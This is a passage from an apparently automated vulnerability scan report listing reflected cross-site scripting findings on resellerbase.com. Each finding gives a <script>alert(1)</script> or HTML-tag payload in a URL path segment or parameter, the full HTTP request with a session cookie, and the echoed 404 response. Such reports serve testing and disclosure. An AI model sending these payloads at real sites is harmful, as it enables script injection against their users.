<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/123d224<script>alert(1)</script>eb42a6969bd/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1043. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 82bcd<script>alert(1)</script>5fd79bfeb2d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes82bcd<script>alert(1)</script>5fd79bfeb2d/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes82bcd<script>alert(1)</script>5fd79bfeb2d/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1044. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e74ea<script>alert(1)</script>68a114b4cf1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmose74ea<script>alert(1)</script>68a114b4cf1/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmose74ea<script>alert(1)</script>68a114b4cf1/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1045. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27c0f<script>alert(1)</script>18f80098625 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images27c0f<script>alert(1)</script>18f80098625/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images27c0f<script>alert(1)</script>18f80098625/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1046. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 98caf<script>alert(1)</script>365072e6023 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating98caf<script>alert(1)</script>365072e6023/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating98caf<script>alert(1)</script>365072e6023/0.gif was not found on this server.</p>
...[SNIP]...

2.1047. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 545e6<script>alert(1)</script>5ad9bf49021 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating/0.gif545e6<script>alert(1)</script>5ad9bf49021 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/0.gif545e6<script>alert(1)</script>5ad9bf49021 was not found on this server.</p>
...[SNIP]...

2.1048. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6909<script>alert(1)</script>366766337b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating/0.gif?e6909<script>alert(1)</script>366766337b7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/0.gif?e6909<script>alert(1)</script>366766337b7=1 was not found on this server.</p>
...[SNIP]...

2.1049. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c83d6<script>alert(1)</script>79fc9678776 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc83d6<script>alert(1)</script>79fc9678776/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc83d6<script>alert(1)</script>79fc9678776/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1050. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload adda6<script>alert(1)</script>ab658c181a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12adda6<script>alert(1)</script>ab658c181a3/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12adda6<script>alert(1)</script>ab658c181a3/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1051. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c66c2<script>alert(1)</script>2273f9c2e38 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themesc66c2<script>alert(1)</script>2273f9c2e38/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themesc66c2<script>alert(1)</script>2273f9c2e38/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1052. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fec7f<script>alert(1)</script>4a685c9e8db was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmosfec7f<script>alert(1)</script>4a685c9e8db/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmosfec7f<script>alert(1)</script>4a685c9e8db/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1053. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4d51f<script>alert(1)</script>dfb1de7eea7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images4d51f<script>alert(1)</script>dfb1de7eea7/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images4d51f<script>alert(1)</script>dfb1de7eea7/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1054. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 75ed9<script>alert(1)</script>4ec5b02281 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating75ed9<script>alert(1)</script>4ec5b02281/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating75ed9<script>alert(1)</script>4ec5b02281/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1055. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 74a86<script>alert(1)</script>40dbb256dec was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating/search.php74a86<script>alert(1)</script>40dbb256dec?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/search.php74a86<script>alert(1)</script>40dbb256dec?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1056. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload aa91a<a>8dd899a2f09 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchaa91a<a>8dd899a2f09&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchaa91a<a>8dd899a2f09&opt=2 was not found on this server.</p>
...[SNIP]...

2.1057. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 65f33<a>f33c8db0d0e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/rating/search.php?keyword=search...65f33<a>f33c8db0d0e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/search.php?keyword=search...65f33<a>f33c8db0d0e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1058. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ca56<script>alert(1)</script>3182a9acdab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&5ca56<script>alert(1)</script>3182a9acdab=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&5ca56<script>alert(1)</script>3182a9acdab=1 was not found on this server.</p>
...[SNIP]...

2.1059. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 83f4d<a>f157490a728 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=283f4d<a>f157490a728 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=283f4d<a>f157490a728 was not found on this server.</p>
...[SNIP]...

2.1060. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3315b<script>alert(1)</script>da89fd1151e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3315b<script>alert(1)</script>da89fd1151e/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3315b<script>alert(1)</script>da89fd1151e/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

